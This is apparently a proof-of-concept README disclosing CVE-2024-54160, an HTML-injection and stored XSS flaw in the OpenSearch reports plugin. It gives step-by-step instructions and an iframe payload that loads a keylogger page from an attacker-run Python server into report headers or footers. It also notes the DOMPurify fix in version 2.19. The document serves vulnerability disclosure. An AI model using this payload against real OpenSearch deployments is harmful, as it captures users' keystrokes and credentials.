# [CVE-2024-54160]-Opensearch-HTML-Injection + Stored XSS
It was found that the Opensearch plugin called "reports" was vulnerable to HTML-injection in version 2.18.0.
The report functionality allowed users to store HTML in the header and footer while creating a new report definition.
Below is a quick proof of concept where I stored an iframe in the header functionality that fetched a JavaScript keylogger from my local machine which recorded the keys typed by the user.
# PoC
1. Edit the keylogger.html file and add a local IP which python3 http.server is running on.
2. Save the keylogger.html
3. Start the python3 server with "python3 -m http.server" in the same path as the keylogger.html file
4. Go to Reports
5. Fill the required fields
6. Select PDF
7. Enable header or footer
8. Enter the iframe payload -> ```<iframe src="http://<IP>:8000/keylogger.html">```
9. Click "Preview" - The keylogger should be loaded from the python server
10. Type something on the keyboard and watch the response in the python server
# Screenshot of the PoC in action
- The iframed content is rendered to the left (I know it's simple and ugly, but it works for a poc :) ).
- The logged keystrokes are shown to the right. (The keylogger PoC was not optimal since it missed some keystrokes though!)
# Remedial Action
This is remediated in Opensearch version 2.19, where the data passed in the footer/header functionality are sanitized with DOMpurify.
Release notes
https://github.com/opensearch-project/opensearch-build/blob/main/release-notes/opensearch-release-notes-2.19.0.md
# PR from Opensearch
https://github.com/opensearch-project/dashboards-reporting/pull/476
# Stored XSS
Version 2.17.9. was also found to be vulnerable for stored Cross-Site Scripting in the same functionality (footer/header).
This is also fixed in version 2.19.0.
# CVE
https://www.cve.org/CVERecord?id=CVE-2024-54160
[4.0K] /data/pocs/5c528e3830a3b27f2639a3e613cf0b4f4c92e983
├── [1.0K] keylogger.html
└── [2.0K] README.md
0 directories, 2 files